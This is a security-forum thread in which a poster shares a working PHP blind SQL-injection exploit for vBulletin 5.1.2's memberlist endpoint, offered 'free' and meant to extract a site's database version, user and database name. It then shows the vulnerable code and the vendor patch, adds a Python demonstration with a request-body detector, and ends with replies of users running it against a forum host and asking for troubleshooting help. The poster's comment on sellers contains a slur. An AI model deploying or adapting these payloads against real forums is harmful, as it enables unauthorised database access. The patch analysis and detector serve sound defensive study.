Nytro

[RST] vBulletin 5.1.2 SQL Injection Exploit


Some idiots are trying to sell it:

http://1337day.com/exploits/22452

For 2000 $. Gay :))

Here it is. Free. :)

```php
<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Get arguments: the target base URL, and the same URL with slashes escaped,
// which is how it appears inside the JSON-encoded response body
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);

// Function to send a POST request
function httpPost($url, $params)
{
    $ch = curl_init($url);

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
    ));

    $output = curl_exec($ch);

    if ($output === false) print htmlspecialchars(curl_error($ch));

    curl_close($ch);
    return $output;
}

// Function to get the string between two other strings
// (a space is prepended so that a match at offset 0 is never confused with "not found")
function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}

// Get version
// Boolean-based blind injection through the unescaped "startswith" filter: the
// memberlist only returns a user whose first letter equals the N-th character of
// version(), so the first letter of the returned username is that character.
// N is advanced until the query matches nothing.

print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";

$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');

$letter = 1;

while (strpos($result, 'No Users Matched Your Query') === false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);

    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];

    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

// Get user (same technique, character by character, against user())

print "\r\nUser: ";

$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');

$letter = 1;

while (strpos($result, 'No Users Matched Your Query') === false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);

    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];

    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

// Get database (same technique against database())

print "\r\nDatabse: ";

$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');

$letter = 1;

while (strpos($result, 'No Users Matched Your Query') === false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);

    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];

    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}

print "\r\n";

?>
```

More details:

The query was the following:

```sql
SELECT
    user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options,
    user.posts, user.joindate, user.usertitle, user.reputation,
    session.lastactivity AS lastvisit,
    IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid
FROM user AS user
LEFT JOIN session AS session ON session.userid = user.userid
WHERE user.username LIKE "D%"
GROUP BY user.userid
ORDER BY user.username ASC
LIMIT 0, 10;
```

The "D" is the controlled parameter, and the quote (") was NOT escaped.

The query was generated with a function from querydefs.php:

```php
public function fetchMemberList($params, $db, $check_only = false)
```

The vulnerable code:

```php
if (!empty($params['startswith']))
{
    if ($params['startswith'] == '#')
    {
        $where[] = 'user.username REGEXP "^[^a-z].?"';
    }
    else
    {
        $where[] = 'user.username LIKE "' . $params['startswith'] . '%"';
    }
}
```

And the patch contains the fix:

```php
if (!empty($params['startswith']))
{
    if ($params['startswith'] == '#')
    {
        $where[] = 'user.username REGEXP "^[^a-z].?"';
    }
    else
    {
        $where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"';
    }
}
```

So now the value is escaped and the SQL injection is fixed.

vBulletin team moved really fast in fixing this problem.

More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst

Edited by Nytro
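Added example, not vBulletin's or Nytro's code: it decodes a constructed memberlist_items POST body the way a form handler would, builds the WHERE fragment both the pre-patch way and with a LIKE-aware escape (an assumed stand-in for $db->escape_string_like, which also neutralises the % and _ wildcards), and includes a small defender-side check over captured request bodies.

```python
from urllib.parse import parse_qs

# Constructed POST body in the shape the thread's script sends (no live target).
PAYLOAD = '"+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+'
BODY = ('criteria[perpage]=10&criteria[startswith]=' + PAYLOAD +
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest')


def startswith_value(body: str) -> str:
    """Decode the startswith filter as a form handler would: '+' becomes a
    space, which is what turns the trailing '--+' into a MySQL comment."""
    return parse_qs(body).get('criteria[startswith]', [''])[0]


def where_vulnerable(startswith: str) -> str:
    """Pre-patch concatenation: the raw value lands inside the quoted literal."""
    return 'user.username LIKE "' + startswith + '%"'


def escape_string_like(value: str) -> str:
    """Assumed behaviour of $db->escape_string_like (not vBulletin's code):
    escape backslash and quotes so the value cannot close the literal, and
    escape the LIKE wildcards so input cannot widen the prefix match."""
    value = value.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
    return value.replace('%', '\\%').replace('_', '\\_')


def where_fixed(startswith: str) -> str:
    """Post-patch concatenation: the value is escaped before it is embedded."""
    return 'user.username LIKE "' + escape_string_like(startswith) + '%"'


def flag_startswith(body: str) -> bool:
    """Check over a captured memberlist_items POST body: a name prefix never
    needs quotes, comment markers or backslashes, so their presence is a signal."""
    value = startswith_value(body)
    return any(marker in value for marker in ('"', "'", '--', '/*', '\\'))


if __name__ == '__main__':
    v = startswith_value(BODY)
    print('vulnerable:', where_vulnerable(v))
    print('fixed:     ', where_fixed(v))
    print('flagged:   ', flag_startswith(BODY))
```

In the vulnerable output the literal closes after `""` and the rest of the page's query is commented out by `-- `; in the fixed output the quote is `\"` and the literal stays intact.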

I tried it on 5.1.2 too, but I get an error:

Notice: Undefined variable: username in /root/nytro.php on line 90
PHP Notice: Undefined variable: username in /root/nytro.php on line 91

L.E.: I think it depends on the link where the "injection" is done ...

Edited by nacks

root@bt:~/Desktop# php vbnew.php http://forum.vullsite.com/

Romanian Security Team - vBulltin 5.1.2 SQL Injection

Version: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

How to fix, Mr. Nytro?
